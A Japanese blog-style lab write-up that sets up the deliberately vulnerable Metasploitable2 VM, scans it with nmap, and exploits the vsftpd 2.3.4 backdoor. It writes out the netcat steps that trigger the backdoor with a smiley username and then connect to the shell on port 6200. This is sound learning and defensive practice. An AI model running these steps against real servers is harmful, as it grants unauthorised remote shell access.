参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」を参考に、
自環境にMetasploitableをセットアップして攻撃してみました。
1.環境
Kali Linux:192.168.0.15
Metasploitable(32bit):192.168.0.23
2.Metasploitable2のセットアップ
Metasploitable2
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
ダウンロードしたイメージはVMwarePlayer用のイメージです。
ESXiで使用するには、vCenter Converterでイメージ変換の必要があります。
Download VMware vCenter Converter Standalone
https://my.vmware.com/en/web/vmware/downloads/info/slug/infrastructure_operations_management/vmware_vcenter_converter_standalone/6_2_0
さっそくvCenter Conveterをインストールして、イメージ変換操作を行います。
変換は約1分で完了です。
「ハッキング・ラボのつくりかた」に従い、
日本語キーボードレイアウトへの変更
sudo loadkeys jp
IP変更
sudo vi /etc/network/interfaces
を行います。
ubuntuのバージョン確認
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
タイムゾーンの変更
sudo dpkg-reconfigure tzdata
Asia->Tokyo
も行います。
3.nmapで攻撃対象のopenポート、バージョンを確認
nmap -sV -O -p- 192.168.0.23
-sV:バージョンスキャン。各ポートのサービスのバージョンを検出する。
-O:フィンガープリント。ターゲットのOSを特定する。
-p-:1番~65535番のポート番号を対象とする。
4.脆弱性情報の確認
CVE
https://cve.mitre.org/index.html
CVEdetails
https://www.cvedetails.com/
Exploit Database
https://www.exploit-db.com/
vsftpd 2.3.4で検索するとバックドアについての情報が出てくる。
5.脆弱性情報の読み方
エンジニアなら脆弱性情報を読めるようになろう
https://cyberagent.ai/blog/tech/4025/
脆弱性対策情報データベース(詳細ページ)の読み方
https://jvndb.jvn.jp/nav/jvndbhelp.html
脆弱性レポートの読み方
https://jvn.jp/nav/jvnhelp.html
CVSSv2読み方
https://www.ipa.go.jp/security/vuln/CVSS.html
CVSSv3読み方
https://www.ipa.go.jp/security/vuln/CVSSv3.html
6.vsftpd2.3.4に攻撃
Kali側の操作
nc 192.168.0.23 21
USER attacker:)
PASS hoge
↑のみでmetasploitable側のPort6200がOpenになります。
nc -nv 192.168.0.23 6200
プロンプトは返ってこないが、下記のようにコマンドを入力すると、
結果が返ってきます。
whoami
uname -a
7.まとめ
vsftpdへの攻撃は簡単に出来てしまったので驚きました。
また、脆弱性に対する攻撃ツールのDBが公開されているのも驚きました。
バージョンアップの大切さがわかりました。